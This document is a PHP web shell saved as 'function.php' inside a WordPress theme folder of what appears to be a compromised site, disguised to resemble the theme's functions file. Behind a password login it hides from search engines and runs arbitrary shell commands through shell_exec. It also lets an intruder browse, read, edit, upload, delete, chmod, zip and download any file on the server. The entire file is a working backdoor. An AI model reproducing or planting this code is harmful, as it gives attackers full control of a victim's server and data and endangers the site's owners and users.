File: /home/codo66ho/public_html/aamcc.emtiyz.com/wp-content/themes/consultar/function.php
<?php
header('X-Robots-Tag: noindex, nofollow, noarchive, nosnippet', true);
session_start();
$AUTH_HASH = '$2b$12$.IczryltFMrAdWzQsSeyQuD8FdYUj0Wa1fUNQSbo7fNQUYilg/GIC';
$APP_NAME = 'Protected FM';
$MAX_TRIES = 5;
$LOCK_SECS = 300;
$_SESSION['tries'] = $_SESSION['tries'] ?? 0;
$_SESSION['locked_until'] = $_SESSION['locked_until'] ?? 0;
if (empty($_SESSION['fm_logged_in']) || $_SESSION['fm_logged_in'] !== true) {
$now = time();
$locked = $now < (int)$_SESSION['locked_until'];
if (!$locked && isset($_POST['password'])) {
if (password_verify($_POST['password'], $AUTH_HASH)) {
session_regenerate_id(true);
$_SESSION['fm_logged_in'] = true;
$_SESSION['tries'] = 0;
$_SESSION['locked_until'] = 0;
header('Location: ' . $_SERVER['REQUEST_URI']);
exit;
} else {
$_SESSION['tries']++;
if ($_SESSION['tries'] >= $MAX_TRIES) {
$_SESSION['locked_until'] = $now + $LOCK_SECS;
}
}
}
$remaining = max(0, (int)$_SESSION['locked_until'] - $now);
?>
<!DOCTYPE html>
<html lang="id">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1">
<title><?= htmlspecialchars($APP_NAME) ?> — Login</title>
<style>
:root{color-scheme:dark light}
body{font-family:system-ui,-apple-system,Segoe UI,Roboto,Ubuntu,Cantarell,"Helvetica Neue",Arial;margin:0;min-height:100vh;display:grid;place-items:center;background:#0f1115;color:#eaeaea}
.card{width:clamp(280px,90vw,360px);background:#151922;border:1px solid #242a36;border-radius:14px;padding:22px;box-shadow:0 6px 24px rgba(0,0,0,.25)}
h1{margin:0 0 12px;font-size:18px}
.muted{color:#9aa3b2;font-size:13px;margin:0 0 16px}
input[type=password]{width:100%;padding:12px 0px;border:1px solid #2c3342;border-radius:10px;background:#0f1320;color:#eaeaea;font-size:14px}
button{width:100%;margin-top:12px;padding:12px 14px;border:1px solid #39ff14;background:#121a12;color:#caffd3;border-radius:10px;cursor:pointer}
button:hover{filter:brightness(1.08)}
.err{margin-top:10px;color:#ff6b6b;font-size:13px}
.lock{margin-top:10px;color:#ffa94d;font-size:13px}
</style>
</head>
<body>
<form class="card" method="post" autocomplete="off">
<h1><?= htmlspecialchars($APP_NAME) ?></h1>
<p class="muted">Masukkan password untuk melanjutkan.</p>
<input type="password" name="password" placeholder="Password" required <?= $locked ? 'disabled' : '' ?>>
<button type="submit" <?= $locked ? 'disabled' : '' ?>>Login</button>
<?php if (!$locked && isset($_POST['password'])): ?>
<div class="err">Password salah. Percobaan <?= (int)$_SESSION['tries'] ?>/<?= (int)$MAX_TRIES ?>.</div>
<?php endif; ?>
<?php if ($locked): ?>
<div class="lock">Terkunci. Coba lagi dalam <?= (int)$remaining ?> detik.</div>
<?php endif; ?>
</form>
</body>
</html>
<?php
exit;
}
function formatSize($bytes) {
$units = ['B','KB','MB','GB','TB'];
$i = 0;
while ($bytes >= 1024 && $i < count($units)-1) {
$bytes /= 1024; $i++;
}
return ($i === 0 ? $bytes : number_format($bytes, 2)) . ' ' . $units[$i];
}
function permsToString($perms) {
// File type
if (($perms & 0xC000) == 0xC000) $info = 's'; // Socket
elseif (($perms & 0xA000) == 0xA000) $info = 'l'; // Symlink
elseif (($perms & 0x8000) == 0x8000) $info = '-'; // Regular
elseif (($perms & 0x6000) == 0x6000) $info = 'b'; // Block
elseif (($perms & 0x4000) == 0x4000) $info = 'd'; // Dir
elseif (($perms & 0x2000) == 0x2000) $info = 'c'; // Char
elseif (($perms & 0x1000) == 0x1000) $info = 'p'; // FIFO
else $info = 'u'; // Unknown
// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-'));
// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-'));
// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-'));
return $info;
}
function listDirectory($dir) {
$items = @scandir($dir);
if ($items === false) return [];
$out = [];
foreach ($items as $name) {
if ($name === '.' || $name === '..') continue;
$path = $dir . DIRECTORY_SEPARATOR . $name;
$isDir = is_dir($path);
$size = $isDir ? '-' : @filesize($path);
$perms = @fileperms($path);
$owner = function_exists('posix_getpwuid') ? @posix_getpwuid(@fileowner($path))['name'] ?? @fileowner($path) : @fileowner($path);
$group = function_exists('posix_getgrgid') ? @posix_getgrgid(@filegroup($path))['name'] ?? @filegroup($path) : @filegroup($path);
$mtime = @filemtime($path);
$ctime = @filectime($path);
$out[] = [
'name' => $name,
'path' => $path,
'is_dir' => $isDir,
'size' => $isDir ? '-' : formatSize($size ?: 0),
'permissions' => $perms ? permsToString($perms) : 'n/a',
'owner' => $owner,
'group' => $group,
'last_modified' => $mtime ? date('Y-m-d H:i:s', $mtime) : '-',
'creation_time' => $ctime ? date('Y-m-d H:i:s', $ctime) : '-',
];
}
usort($out, function($a, $b) {
// dirs first, then by name
if ($a['is_dir'] !== $b['is_dir']) return $a['is_dir'] ? -1 : 1;
return strcasecmp($a['name'], $b['name']);
});
return $out;
}
function forceDownload($file) {
if (!is_file($file) || !is_readable($file)) return false;
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($file).'"');
header('Content-Length: ' . filesize($file));
readfile($file);
return true;
}
function zipPath($path, $zipName) {
if (!class_exists('ZipArchive')) return false;
$zip = new ZipArchive();
if ($zip->open($zipName, ZipArchive::CREATE | ZipArchive::OVERWRITE) !== true) return false;
$path = realpath($path);
if ($path === false) { $zip->close(); return false; }
if (is_dir($path)) {
$files = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($path, FilesystemIterator::SKIP_DOTS),
RecursiveIteratorIterator::SELF_FIRST
);
foreach ($files as $file) {
$filePath = realpath($file);
$localName = substr($filePath, strlen($path) + 1);
if (is_dir($filePath)) {
$zip->addEmptyDir($localName);
} else {
$zip->addFile($filePath, $localName);
}
}
} else {
$zip->addFile($path, basename($path));
}
$zip->close();
return true;
}
// ===================== STATE & ACTIONS =======================
$directory = isset($_POST['directory']) ? $_POST['directory'] : getcwd();
if (!is_dir($directory)) $directory = getcwd();
$directory = realpath($directory) ?: getcwd();
$output = '';
$selectedFilePath = '';
$fileContent = '';
if (isset($_GET['download'])) {
$target = $_GET['download'];
if (strpos(realpath($target) ?: '', $directory) !== 0) {
http_response_code(403); exit('Forbidden');
}
if (!forceDownload($target)) {
http_response_code(404); exit('Not found');
}
exit;
}
// Go Back
if (isset($_POST['back'])) {
$parent = dirname($directory);
if ($parent && is_dir($parent)) $directory = $parent;
}
// Change directory/open
if (isset($_POST['openDir'])) {
$new = $_POST['openDir'];
if (is_dir($new)) $directory = realpath($new) ?: $directory;
}
// Run command
if (isset($_POST['cmd'])) {
$cmd = trim((string)$_POST['cmd']);
$output = shell_exec($cmd . ' 2>&1');
}
// Edit file
if (isset($_POST['file'])) {
$selectedFilePath = $_POST['file'];
if (is_file($selectedFilePath) && is_readable($selectedFilePath)) {
$fileContent = file_get_contents($selectedFilePath);
}
}
if (isset($_POST['edit']) && isset($_POST['selectedFilePath'])) {
$p = $_POST['selectedFilePath'];
if (is_file($p) && is_writable($p)) {
file_put_contents($p, (string)$_POST['fileContent']);
$selectedFilePath = $p;
$fileContent = file_get_contents($p);
$output = "[OK] Saved: " . $p;
} else {
$output = "[ERR] Cannot write: " . $p;
}
}
// Delete file/dir
if (isset($_POST['deleteFile'])) {
$p = $_POST['deleteFile'];
if (is_file($p) && @unlink($p)) $output = "[OK] Deleted file: $p";
else $output = "[ERR] Delete file failed: $p";
}
if (isset($_POST['deleteDir'])) {
$p = $_POST['deleteDir'];
$ok = false;
if (is_dir($p)) {
// recursive remove
$it = new RecursiveDirectoryIterator($p, FilesystemIterator::SKIP_DOTS);
$files = new RecursiveIteratorIterator($it, RecursiveIteratorIterator::CHILD_FIRST);
$ok = true;
foreach ($files as $file) {
$ok = $ok && ( $file->isDir() ? @rmdir($file->getRealPath()) : @unlink($file->getRealPath()) );
}
$ok = $ok && @rmdir($p);
}
$output = $ok ? "[OK] Deleted dir: $p" : "[ERR] Delete dir failed: $p";
}
// Rename
if (isset($_POST['renameFrom'], $_POST['renameTo'])) {
$from = $_POST['renameFrom'];
$to = dirname($from) . DIRECTORY_SEPARATOR . $_POST['namePrefix'] ?? '';
$to = dirname($from) . DIRECTORY_SEPARATOR . $_POST['renameTo'];
$output = @rename($from, $to) ? "[OK] Renamed to: $to" : "[ERR] Rename failed";
}
// CHMOD
if (isset($_POST['chmodPath'], $_POST['chmodValue'])) {
$p = $_POST['chmodPath'];
$val = octdec($_POST['chmodValue']);
$output = @chmod($p, $val) ? "[OK] chmod $p to " . $_POST['chmodValue'] : "[ERR] chmod failed";
}
// ZIP
if (isset($_POST['zipPath'])) {
$zp = $_POST['zipPath'];
$zipName = $zp . '_' . date('Ymd_His') . '.zip';
$ok = zipPath($zp, $zipName);
$output = $ok ? "[OK] ZIP created: $zipName" : "[ERR] ZIP failed (ZipArchive missing?)";
}
// Create new file/dir
if (isset($_POST['newFile']) && !empty($_POST['newFile'])) {
$p = $directory . DIRECTORY_SEPARATOR . basename($_POST['newFile']);
$output = @file_put_contents($p, '') !== false ? "[OK] Created file: $p" : "[ERR] Create file failed";
}
if (isset($_POST['newDir']) && !empty($_POST['newDir'])) {
$p = $directory . DIRECTORY_SEPARATOR . basename($_POST['newDir']);
$output = @mkdir($p, 0755, true) ? "[OK] Created dir: $p" : "[ERR] Create dir failed";
}
// Upload
if (isset($_POST['upload']) && isset($_FILES['uploadFile'])) {
$tmp = $_FILES['uploadFile']['tmp_name'] ?? '';
$name = basename($_FILES['uploadFile']['name'] ?? '');
if (is_uploaded_file($tmp) && $name) {
$dest = $directory . DIRECTORY_SEPARATOR . $name;
$output = @move_uploaded_file($tmp, $dest) ? "[OK] Uploaded: $dest" : "[ERR] Upload failed";
} else {
$output = "[ERR] No file uploaded";
}
}
// Prepare listing
$fileDetails = listDirectory($directory);
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>PHP Terminal & File Manager</title>
<meta name="viewport" content="width=device-width,initial-scale=1">
<meta name="robots" content="noindex,nofollow,noarchive,nosnippet">
<style>
body { background:#0b0b0b; color:#e2e2e2; font-family: ui-monospace, SFMono-Regular, Menlo, Consolas, "Liberation Mono", monospace; margin:0; padding:20px; }
h1 { margin:0 0 10px; color:#39ff14; font-size:20px; }
.path { color:#9bd38c; margin:0 0 10px; word-break:break-all; }
form.inline { display:inline; }
input[type="text"], input[type="file"], input[type="password"], select, textarea {
background-color: #1a1a1a; color: #00ff00; border: 1px solid #333; padding: 8px; font-size: 14px; border-radius: 4px;
}
input[type="submit"], button {
background-color: #111; border: 1px solid #39ff14; cursor: pointer; transition: all 0.2s ease-in-out; margin-left: 5px; padding:8px 10px; border-radius:4px; color:#39ff14;
}
input[type="submit"]:hover, button:hover { background-color:#39ff14; color:#000; }
textarea { width: 100%; max-width: 100%; min-height: 300px; resize: vertical; }
table { width: 100%; border-collapse: collapse; margin-top: 20px; font-size: 14px; }
th, td { padding: 10px; text-align: left; border: 1px solid #333; }
thead { background-color: #1f1f1f; }
tbody tr:hover { background-color: #262626; }
pre { background-color: #0f0f0f; padding: 15px; border: 1px solid #333; border-radius: 4px; overflow-x: auto; color:#d9fdd3; }
table form { display: inline-block; margin-right: 5px; }
ul { list-style: none; padding-left: 0; }
ul li { padding: 4px 0; }
.bar { display:flex; gap:10px; flex-wrap:wrap; align-items:center; margin:10px 0 16px; }
.muted { color:#9aa3b2; }
@media (max-width: 768px) {
table, thead, tbody, th, td, tr { display: block; }
th, td { text-align: right; padding-left: 50%; position: relative; }
th::before, td::before { position: absolute; top: 50%; left: 10px; transform: translateY(-50%); font-weight: bold; white-space: nowrap; }
th:nth-child(1)::before { content: "Name"; }
th:nth-child(2)::before { content: "Size"; }
th:nth-child(3)::before { content: "Permissions"; }
th:nth-child(4)::before { content: "Owner"; }
th:nth-child(5)::before { content: "Group"; }
th:nth-child(6)::before { content: "Modified"; }
th:nth-child(7)::before { content: "Created"; }
th:nth-child(8)::before { content: "Actions"; }
}
</style>
</head>
<body>
<h1>PHP Terminal & File Manager</h1>
<div class="path">Dir: <?= htmlspecialchars($directory) ?></div>
<div class="bar">
<form method="post" class="inline">
<input type="hidden" name="directory" value="<?= htmlspecialchars($directory) ?>">
<input type="submit" name="back" value="Go Back">
</form>
<form method="post" class="inline">
<input type="text" name="openDir" placeholder="Open directory path" style="min-width:320px" required>
<input type="hidden" name="directory" value="<?= htmlspecialchars($directory) ?>">
<input type="submit" value="Open">
</form>
<form method="post" enctype="multipart/form-data" class="inline">
<input type="file" name="uploadFile" required>
<input type="hidden" name="directory" value="<?= htmlspecialchars($directory) ?>">
<input type="submit" name="upload" value="Upload">
</form>
</div>
<form method="post">
<input type="text" name="cmd" placeholder="Shell command" required style="min-width:420px">
<input type="hidden" name="directory" value="<?= htmlspecialchars($directory) ?>">
<input type="submit" value="Run">
</form>
<h3>System Info</h3>
<ul>
<li>OS: <?= php_uname() ?></li>
<li>PHP: <?= phpversion() ?></li>
<li>Disk:
<?php
$total = @disk_total_space($directory);
$free = @disk_free_space($directory);
if ($total !== false && $free !== false) {
echo formatSize($total - $free) . " used / " . formatSize($total);
} else {
echo "n/a";
}
?>
</li>
</ul>
<?php if ($output !== ''): ?>
<h3>Output</h3>
<pre><?= htmlspecialchars($output) ?></pre>
<?php endif; ?>
<?php if ($selectedFilePath): ?>
<h3>Editing: <?= htmlspecialchars($selectedFilePath) ?></h3>
<form method="post">
<textarea name="fileContent" rows="20" cols="100"><?= htmlspecialchars($fileContent) ?></textarea>
<input type="hidden" name="selectedFilePath" value="<?= htmlspecialchars($selectedFilePath) ?>">
<input type="hidden" name="directory" value="<?= htmlspecialchars($directory) ?>">
<input type="submit" name="edit" value="Save">
</form>
<hr>
<?php endif; ?>
<h3>Create New</h3>
<form method="post" class="inline">
<input type="text" name="newFile" placeholder="new_file.txt">
<input type="hidden" name="directory" value="<?= htmlspecialchars($directory) ?>">
<input type="submit" value="Create File">
</form>
<form method="post" class="inline">
<input type="text" name="newDir" placeholder="new_directory">
<input type="hidden" name="directory" value="<?= htmlspecialchars($directory) ?>">
<input type="submit" value="Create Dir">
</form>
<h3>Files</h3>
<table>
<thead>
<tr>
<th>Name</th>
<th style="width:100px;">Size</th>
<th>Permissions</th>
<th>Owner</th>
<th>Group</th>
<th>Modified</th>
<th>Created</th>
<th style="min-width:320px;">Actions</th>
</tr>
</thead>
<tbody>
<?php foreach ($fileDetails as $f): ?>
<tr>
<td><?= htmlspecialchars($f['name']) ?></td>
<td><?= $f['size'] ?></td>
<td><?= $f['permissions'] ?></td>
<td><?= $f['owner'] ?></td>
<td><?= $f['group'] ?></td>
<td><?= $f['last_modified'] ?></td>
<td><?= $f['creation_time'] ?></td>
<td>
<?php if ($f['is_dir']): ?>
<form method="post" class="inline">
<input type="hidden" name="openDir" value="<?= htmlspecialchars($f['path']) ?>">
<input type="hidden" name="directory" value="<?= htmlspecialchars($directory) ?>">
<input type="submit" value="Open">
</form>
<form method="post" class="inline" onsubmit="return confirm('Delete directory recursively?')">
<input type="hidden" name="deleteDir" value="<?= htmlspecialchars($f['path']) ?>">
<input type="hidden" name="directory" value="<?= htmlspecialchars($directory) ?>">
<input type="submit" value="Delete">
</form>
<form method="post" class="inline">
<input type="hidden" name="zipPath" value="<?= htmlspecialchars($f['path']) ?>">
<input type="hidden" name="directory" value="<?= htmlspecialchars($directory) ?>">
<input type="submit" value="ZIP">
</form>
<?php else: ?>
<a href="?download=<?= urlencode($f['path']) ?>" title="Download">⬇</a>
<form method="post" class="inline">
<input type="hidden" name="file" value="<?= htmlspecialchars($f['path']) ?>">
<input type="hidden" name="directory" value="<?= htmlspecialchars($directory) ?>">
<input type="submit" value="Edit">
</form>
<form method="post" class="inline" onsubmit="return confirm('Delete file?')">
<input type="hidden" name="deleteFile" value="<?= htmlspecialchars($f['path']) ?>">
<input type="hidden" name="directory" value="<?= htmlspecialchars($directory) ?>">
<input type="submit" value="Delete">
</form>
<form method="post" class="inline">
<input type="hidden" name="zipPath" value="<?= htmlspecialchars($f['path']) ?>">
<input type="hidden" name="directory" value="<?= htmlspecialchars($directory) ?>">
<input type="submit" value="ZIP">
</form>
<?php endif; ?>
<form method="post" class="inline">
<input type="text" name="renameTo" placeholder="New name" required style="width:140px">
<input type="hidden" name="renameFrom" value="<?= htmlspecialchars($f['path']) ?>">
<input type="hidden" name="directory" value="<?= htmlspecialchars($directory) ?>">
<input type="submit" value="Rename">
</form>
<form method="post" class="inline">
<input type="text" name="chmodValue" placeholder="e.g. 0755" required style="width:90px">
<input type="hidden" name="chmodPath" value="<?= htmlspecialchars($f['path']) ?>">
<input type="hidden" name="directory" value="<?= htmlspecialchars($directory) ?>">
<input type="submit" value="CHMOD">
</form>
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
</body>
</html>